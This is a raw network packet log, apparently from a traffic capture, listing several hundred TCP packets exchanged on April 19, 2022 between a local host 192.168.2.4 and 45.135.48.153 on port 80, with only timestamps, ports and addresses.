Apr 19, 2022 16:44:42.175602913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.175728083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.175782919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.175801039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.175940037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.175997972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.176116943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176198959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176255941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.176276922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176399946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176476002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.176507950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176603079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176654100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.176734924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176879883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.176947117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.176995039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177058935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177108049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.177201033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177320957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177376986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.177427053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177525043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177583933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.177685976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177799940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177879095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.177917004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.178000927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178050995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.178078890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178251028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178318024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178354979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.178405046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178452969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.178560972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178637028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178685904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.178807974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.178921938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179042101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179080963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.179117918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179167032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.179203033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179363012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179419041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.179471016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179588079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179637909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.179673910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179883003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179902077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.179941893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.180083990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180135965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.180171013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180243015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180293083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.180351019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180501938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180567026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.180586100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180722952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180777073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.180826902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180919886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.180969000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.181035995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181137085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181188107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.181236982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181404114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181457996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.181508064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181658983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181720972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.181721926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181885004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.181937933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.181961060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182084084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182137966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.182212114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182326078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182378054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.182435989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182521105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182571888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.182641983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182761908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.182815075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.182863951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183002949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183056116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.183083057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183203936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183254957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.183312893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183415890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183471918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.183520079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183634996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183689117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.183760881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183882952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.183944941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.184042931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.184081078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.184132099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.184242010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.184324026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.184376001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.294992924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295027971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295116901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295201063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.295238018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295308113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.295351982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295481920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295538902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.295563936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295697927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295754910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.295783997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295918941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.295977116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.296003103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296118975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296175003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.296240091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296365023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296437979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.296524048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296601057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296657085 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.296685934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296796083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.296857119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.296967030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297044039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297100067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.297127008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297277927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297336102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.297400951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297502041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297563076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.297601938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297722101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297775984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.297883034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.297960043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298016071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.298044920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298244953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298265934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298306942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.298402071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298456907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.298518896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298604012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298659086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.298712015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298840046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.298898935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.298976898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299082041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299140930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.299165964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299278975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299336910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.299401045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299523115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299581051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.299631119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299830914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299876928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.299899101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.299951077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300013065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.300121069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300205946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300307035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.300323963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300443888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300523996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.300564051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300709009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300770998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.300801992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300883055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.300941944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.300997019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301120996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301187038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.301193953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301336050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301394939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.301467896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301598072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301656008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.301672935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301785946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.301845074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.301901102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302000046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302124023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302202940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.302246094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302309990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.302347898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302479029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302539110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.302578926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302675009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302728891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.302783966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302922010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.302983046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.303037882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303041935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.303158045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303216934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.303275108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303402901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303458929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.303514957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303601980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303658009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.303714037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303845882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.303904057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.304003954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304124117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304192066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.304271936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304404020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304475069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.304512024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304600954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304698944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.304761887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304867029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.304945946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.304996967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305063009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305141926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305198908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305238962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.305263042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.305288076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305443048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305531025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.305563927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305639982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305706024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.305763960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305879116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.305934906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.305958986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306123018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306200027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.306237936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306365013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306425095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.306442022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306561947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306632996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.306638956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306761026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.306812048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.306859970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307034016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307085991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.307101011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307235956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307300091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.307351112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307502031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307550907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307574987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.307686090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307743073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.307789087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307920933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.307981014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.308033943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308119059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308176041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.308235884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308341026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308404922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.308479071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308561087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308618069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.308722019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308847904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.308931112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.309015989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309045076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309117079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.309166908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309245110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309298992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.309403896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309494019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309565067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.309612989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309786081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309854031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.309854984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.309973001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310048103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.310094118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310190916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310271978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.310292006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310415983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310488939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.310547113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310645103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310707092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.310743093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310854912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.310920000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.310942888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.311081886 CEST	80	49758	45.135.48.153	192.168.2.4
